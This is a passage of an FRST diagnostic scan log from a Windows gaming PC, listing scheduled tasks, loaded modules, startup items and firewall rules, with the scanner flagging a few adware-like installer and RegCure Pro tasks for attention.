Task: {2F037E21-D0F8-4014-A901-829A7820AB5E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {31718128-098F-4BB9-BAE0-DE20FCC657AB} - System32\Tasks\Installer_smknnodesk => C:\Users\PimpSlap\AppData\Local\Installer\Installsmknnodesk_32556\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {35F0F950-2529-40D1-8527-7A290FE06D3D} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-12-09] (Microsoft Corporation)
Task: {3D60D3FD-89B8-4AAD-9589-85D3B007D66E} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {3F7B4894-E007-452C-88F0-EC4B24416730} - System32\Tasks\RegCure Pro Startup => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe
Task: {401A3FFB-EE39-4E88-A83F-076E7ABA54E3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-19] (Adobe Systems Incorporated)
Task: {427AE940-8475-4C67-BA94-89C1E3D157D4} - System32\Tasks\ParetoLogic Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll" RunUns
Task: {4A0440C5-320B-40CC-B3F8-65DBB2C2D4FA} - System32\Tasks\{6C27EFA9-C11D-4DE8-9C38-B574A63BB94F} => pcalua.exe -a "C:\Program Files (x86)\Steam\SteamApps\common\Grand Theft Auto IV\Installers\vcredist_x86.exe" -d "C:\Program Files (x86)\Steam\SteamApps\common\Grand Theft Auto IV\Installers"
Task: {52523B24-79B7-42DF-9392-D0EA104B9ACF} - System32\Tasks\ParetoLogic Update Version3 => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: {571FFB71-819A-4C4F-A66B-2175AACA257B} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {5C3BB34F-123C-424F-BF94-9EBA1FB3095B} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {5D03BF7B-0AB8-4D9F-A00C-33FCF0A90476} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {6046CC50-8E8F-4EF6-8AD9-18EC12AD90C7} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {60E1C591-65B3-4B02-92AE-48C0906FAEE9} - System32\Tasks\ParetoLogic Update Version3_triggeronce => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: {6397674F-4357-4CE8-B742-050381F92FCA} - System32\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {63BA6AC1-A2A8-4A75-94AD-7B7BAF64C943} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {69CDE21F-8740-4D61-AA13-476D024D036A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {6C4FB60D-69AB-4C28-B212-CF26ECC5C71A} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {758061B9-8BA6-4117-A22D-3105225E5CDC} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {84634419-0B04-4937-9618-5EEA1B7D268E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {943759B5-D17E-4A51-8B43-11CA0ADE8492} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {9E37A41E-0B81-4185-B57D-D11D4514408A} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A16F7F04-77C4-4081-A28A-F42F5FFD3532} - System32\Tasks\{7E8CFA39-6414-4B94-BF78-7245A4BCF78E} => Chrome.exe hxxp://ui.skype.com/ui/0/7.7.0.103/en/abandoninstall?page=tsBing
Task: {A91E6011-C8AE-4509-9EE9-6DB4B2051670} - System32\Tasks\Installer_DSKB => C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {AE4C319A-2361-4BE1-8FBB-C8493C6F2372} - System32\Tasks\{486836BD-3952-4285-B823-2EC6E43B3FBB} => pcalua.exe -a "C:\Program Files (x86)\Sniper Elite 3\_CommonRedist\vcredist\2010\vcredist_x64.exe" -d "C:\Program Files (x86)\Sniper Elite 3\_CommonRedist\vcredist\2010"
Task: {AF90F3C7-403B-42CD-939C-E19079940338} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {AFA2FEAF-2590-4185-BBCE-17550071080F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {C1B0097B-7CEB-4A29-BC35-5A325EAB595D} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {C6ECE819-62EA-4DD7-8CD9-AB9DB52495AD} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C9DE9167-B167-4CA7-B58E-F0F750258194} - System32\Tasks\AdobeAAMUpdater-1.0-PimpSlap-PC-PimpSlap => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {D42682DB-910D-46BF-950F-584A6578B3A2} - System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
Task: {DABFC1BA-52F0-41D1-85D4-826EEBC6E4F2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {DADB9295-D367-4867-B8FD-D4493B18DED1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {DD4EA7BC-A6CF-44FA-9A20-A3F44E219280} - System32\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {F0C7D7F1-F49D-4694-851A-E3EA51B481B5} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\ParetoLogic Registration3.job => C:\Windows\system32\rundll32.exeGC:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll
Task: C:\WINDOWS\Tasks\ParetoLogic Update Version3.job => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: C:\WINDOWS\Tasks\ParetoLogic Update Version3_triggeronce.job => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: C:\WINDOWS\Tasks\RegCure Pro Startup.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe
Task: C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2015-07-09 19:33 - 2015-07-09 19:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-09 21:08 - 2015-09-09 21:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-06-22 20:37 - 2015-06-22 20:37 - 00214528 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll
2014-02-11 06:08 - 2014-02-11 06:08 - 00817152 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Device.dll
2014-02-11 06:08 - 2014-02-11 06:08 - 03650560 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Platform.dll
2015-09-09 21:08 - 2015-09-09 21:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 16:56 - 2015-08-11 16:55 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe
2015-10-11 18:31 - 2015-09-16 22:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-06-22 20:37 - 2015-06-22 20:37 - 00102400 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2015-10-11 18:31 - 2015-09-16 22:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-10-11 18:30 - 2015-09-16 21:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-09 19:13 - 2015-07-09 19:13 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-09 09:15 - 2015-11-24 20:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 09:15 - 2015-11-24 20:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 09:15 - 2015-11-24 20:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-11 18:31 - 2015-09-16 21:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-09 19:13 - 2015-09-09 21:08 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2015-08-24 05:56 - 2015-08-24 05:56 - 00039384 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2015-05-26 15:09 - 2015-05-26 15:09 - 00259584 _____ () C:\Program Files\Telestream\Wirecast\filters\WirecastVirtualCamera.ax
2015-12-09 15:28 - 2015-12-04 13:32 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\libglesv2.dll
2015-12-09 15:28 - 2015-12-04 13:32 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\PimpSlap:Heroes & Generals
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\google.com -> hxxps://www.google.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\mirillis.com -> hxxps://mirillis.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\sony.com -> sony.com
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PimpSlap\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\worldoftanks 7-13-2015 5-17-47 pm-429.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: AMD FUEL Service => 2
MSCONFIG\Services: Beard => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: ReflectService.exe => 2
MSCONFIG\Services: RzKLService => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: Raptr => C:\PROGRA~2\Raptr\RAPTRS~1.EXE --startup
HKLM\...\StartupApproved\Run: => "XboxStat"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "MyComGames"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "Razer Comms"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{F9CAC4A2-B9E3-4215-9857-2028E4423818}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Burstfire\Burstfire.exe
FirewallRules: [{A2B52FA7-4816-41C9-9E4A-B44BC5F2B3DD}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rainbow Six Siege - Closed Beta\RainbowSix.exe
FirewallRules: [{BF596D20-EE74-4C0E-900D-A1902AD2B340}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rainbow Six Siege - Closed Beta\RainbowSix.exe
FirewallRules: [{DCF04272-1FF1-49E4-88A4-BCED35B3073E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{33707DF8-9DA5-4A68-93FC-17DFDBF3A3B4}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{B8F64A4E-D387-451F-93D3-32CD9FD27350}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\AVA\NWZLauncher.exe
FirewallRules: [{3F80E459-BA32-43C8-97C8-B7862F683561}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\AVA\NWZLauncher.exe
FirewallRules: [{DA022CCB-B9B6-4979-8141-C0197F1D8B44}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Alien Swarm\swarm.exe
FirewallRules: [{39A63DE2-6DB0-4298-914C-2B5E672C8BF7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Alien Swarm\swarm.exe
FirewallRules: [{A5F3D12F-C7D5-42F0-982D-7C30D5A26082}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SuperMNC\Binaries\Win32\SuperMNCGameClient.exe
FirewallRules: [{4BE6D5C6-A2CA-4C0F-BC2A-81BA555EF3E8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SuperMNC\Binaries\Win32\SuperMNCGameClient.exe
FirewallRules: [{A2FF337E-8DBC-4839-9F1D-6F41501FCF59}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Spiral Knights\java_vm\bin\javaw.exe
FirewallRules: [{3FA6CBD8-205F-473D-8DC9-AB6531F8C7A1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Spiral Knights\java_vm\bin\javaw.exe
FirewallRules: [{6823D23C-880B-47AB-BE56-F3C35CC423AA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Grand Theft Auto IV\GTAIV\LaunchGTAIV.exe
FirewallRules: [{2C36F3BF-748E-49BE-A26A-10348ACE7FEB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Grand Theft Auto IV\GTAIV\LaunchGTAIV.exe
FirewallRules: [UDP Query User{7E16E53F-EC66-4BEE-99C6-2E1D3568244B}C:\users\pimpslap\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\pimpslap\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [TCP Query User{9CCB28E1-2389-4966-8B39-FEE8F92FDF8A}C:\users\pimpslap\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\pimpslap\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [{551434DA-8234-4C98-8148-F4DAFA8CFEE8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\BeamNG.drive\BeamNG.drive.exe
FirewallRules: [{6DC75673-3305-48D1-9037-A55F494D13CC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\BeamNG.drive\BeamNG.drive.exe
FirewallRules: [{CFA6F8F6-32CE-472E-8797-DC2A0FD4BF34}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{D0244600-07FF-43DA-9367-92EBA9BBA2DA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{21B77C1E-15A3-4050-B766-F8462E6C12C2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SourceFilmmaker\game\bin\qsdklauncher.exe
FirewallRules: [{007D3775-C573-4B70-B172-537E74A23B1A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SourceFilmmaker\game\bin\qsdklauncher.exe
FirewallRules: [{FDC18051-5975-4248-B74F-DCB23D3F41D3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SourceFilmmaker\game\sfm.exe
FirewallRules: [{D99058BF-FCA7-4E00-848A-8B395744B52F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SourceFilmmaker\game\sfm.exe
FirewallRules: [{F43A713C-6F2B-45B6-B4A0-8087F7BDDCB5}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{256C2C4F-CC99-4374-B62A-DBA6CBFC2073}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{9FDBCEE8-29D6-4185-883F-F7400C50C244}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{803B661E-CE24-4D95-9426-2CBA65B8C9DB}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{62A9303A-E89A-4247-8B9B-96BD9AC21C2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Silent Hunter 5\sh5.exe
FirewallRules: [{302A7E1A-1327-471F-B5D7-CD1ECDF2F649}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Silent Hunter 5\sh5.exe
FirewallRules: [{0944E399-8797-4D7C-A4A3-A541074737F2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Silent Hunter 3\sh3.exe
FirewallRules: [{A65EF72A-9A59-40C1-911A-296CF92D1FC5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Silent Hunter 3\sh3.exe
FirewallRules: [{7C5AF60A-8090-41FA-9DB6-21E9E141D6D6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Silent Hunters Wolves of the Pacific\sh4.exe
FirewallRules: [{0AC33657-7C2D-433A-B3FD-59210B9EA055}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Silent Hunters Wolves of the Pacific\sh4.exe
FirewallRules: [{3D06BF37-3444-4E8F-8430-0F9663D5AC09}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{5E2E9CD3-9165-4544-A760-50CD547BBD61}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{29F9A5E8-0B16-4A64-9835-D00B188D2B3D}] => (Allow) C:\Users\PimpSlap\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{C2D31726-BE23-40D9-9782-16470107DDB0}] => (Allow) C:\Users\PimpSlap\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5510FBCF-AC37-43CE-9E45-809EE72F6FAF}] => (Allow) C:\Users\PimpSlap\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9AF76D77-D840-4CB8-9E2A-7C9F8B272A4D}] => (Allow) C:\Users\PimpSlap\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{924DFCF4-17F8-4E81-A7F8-0656CF0FB348}] => (Allow) C:\Users\PimpSlap\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{BD00761E-625D-464A-ABE9-4DE4BAB7617F}] => (Allow) C:\Users\PimpSlap\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{0D670518-7FE3-4544-B3DF-2091645B3C05}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{14C97CAC-5E2B-491D-8950-1ED7085BBEA5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{04B0B131-2A9C-41C1-834A-AE810D21F709}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{2C8B1633-9BA9-4CA3-B937-E7A8276A2B50}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{6B5400F0-8B42-437F-9A43-1F021DD30C1F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\APB Reloaded\Binaries\APB.exe
FirewallRules: [{9C0F883E-C287-4DE2-9C8B-70AA933D635D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\APB Reloaded\Binaries\APB.exe
FirewallRules: [{654B1AD4-3614-4873-BC53-5491AE5F7600}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{B340EE5E-1799-402F-8DA4-B80AC5DF0456}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{D3547211-08C1-4C38-A979-4D2CC540053E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{5D38878C-9FDE-4743-8755-F04283203C88}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{BF2E0998-D60B-423D-8F85-C9993807CE3C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{CEE7D037-8A63-4AE6-A843-DA8DD398DB98}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F291C6DB-62E4-4280-B692-47F0737DD352}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{BA109B33-3C2E-4CE8-ABDE-DA46E3C79910}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{4AB727B8-718C-4EFF-ADFA-83C53152F575}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{D3D2F3D0-C7CA-4435-B77C-B94F6DCC7D32}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{C7A37033-504A-4FA7-9954-22314A19C240}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{246DEBF5-D0C2-48EE-9D01-CF2F059A8ABF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\APB Reloaded\Launcher\APBLauncher.exe
FirewallRules: [{D8DAFA4B-15C5-428F-B616-CFAD3A16788D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\APB Reloaded\Launcher\APBLauncher.exe
FirewallRules: [{2D2B2DF3-7985-413F-9B19-24715665EA04}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{66348BCE-24B3-473E-BDB4-6527A3F3ED34}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{F3B3E636-3E00-40DE-ACEC-312F3E2ED2A9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PlanetSide 2\LaunchPad.exe
FirewallRules: [{67EEBDDB-5542-4501-BDF5-D0D2C3154F3B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PlanetSide 2\LaunchPad.exe
FirewallRules: [{9C0D46AA-CCC3-4DB9-8F7B-5514A4456C86}] => (Allow) LPort=8090
FirewallRules: [{1609B186-0879-4536-AE87-66116479C08E}] => (Allow) LPort=20443
FirewallRules: [{EA72CA5D-7D20-4552-988C-A685DEA597D1}] => (Allow) LPort=33333
FirewallRules: [{EB7165E5-DC7D-4AAB-B370-7AF5D38B3852}] => (Allow) LPort=6881
FirewallRules: [{8FF4DB70-3873-4476-B120-C43423412F0A}] => (Allow) LPort=27022
FirewallRules: [{E16293A5-F0D0-4B56-9706-76E72DBF829C}] => (Allow) LPort=7853
FirewallRules: [{DB4EC8DB-F79E-4892-9906-B47A31B8CF4F}] => (Allow) LPort=7852
FirewallRules: [{7F60B0BC-DFA4-435F-8BEF-C9022B2B317C}] => (Allow) LPort=7850
FirewallRules: [{1BC074FF-8A51-48CE-A8A8-7232E7F72D01}] => (Allow) LPort=3478
FirewallRules: [{4830DFBD-11C6-4265-827B-EB73B816929F}] => (Allow) LPort=20010
FirewallRules: [{B9064628-5961-4B83-9260-7EE27866AFCE}] => (Allow) LPort=443
FirewallRules: [{0396A0AF-07B7-4C1D-9980-76F2A299CAFE}] => (Allow) LPort=80
FirewallRules: [{800CC17C-6B9A-4CA8-B1E8-2A30DB04F884}] => (Allow) C:\WarThunder\bpreport.exe
FirewallRules: [{EEE5763E-8C94-4DF7-A055-0F16185F464D}] => (Allow) C:\WarThunder\bpreport.exe
FirewallRules: [{FD696193-45C1-4A8F-8184-BFC206287E34}] => (Allow) C:\WarThunder\launcher.exe
FirewallRules: [{284F1131-EC7D-41AF-851A-B21F8DC0EA8F}] => (Allow) C:\WarThunder\launcher.exe
FirewallRules: [{02CD1919-5353-4ADE-8FD9-0D7778310EF4}] => (Allow) C:\Games\World_of_Tanks\WorldofTanks.exe
FirewallRules: [{EBEEDB34-0904-4ABB-858F-F787C9C0183A}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{F2E3BAEF-E376-4A99-8BB9-3C691AE7B05D}] => (Allow) LPort=1900
FirewallRules: [{FBD9B977-E412-4A41-BE6F-0F9DC030B8D2}] => (Allow) LPort=2869
FirewallRules: [{4CE1EBF4-B93B-4D1C-B3E3-EE9EB066F9D3}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7C5D3776-6D3C-42D0-B34C-47D02FC0E9ED}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{AC8161CC-CDDE-4A1E-9AD6-ED4A34B23F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{DC0895F7-3655-4E16-A013-2DB1F0F2E472}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{5D18B9C6-5058-4EBC-B534-BE1EDB282EA5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{69E563F2-FC73-4D6B-AE0D-81A718528917}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
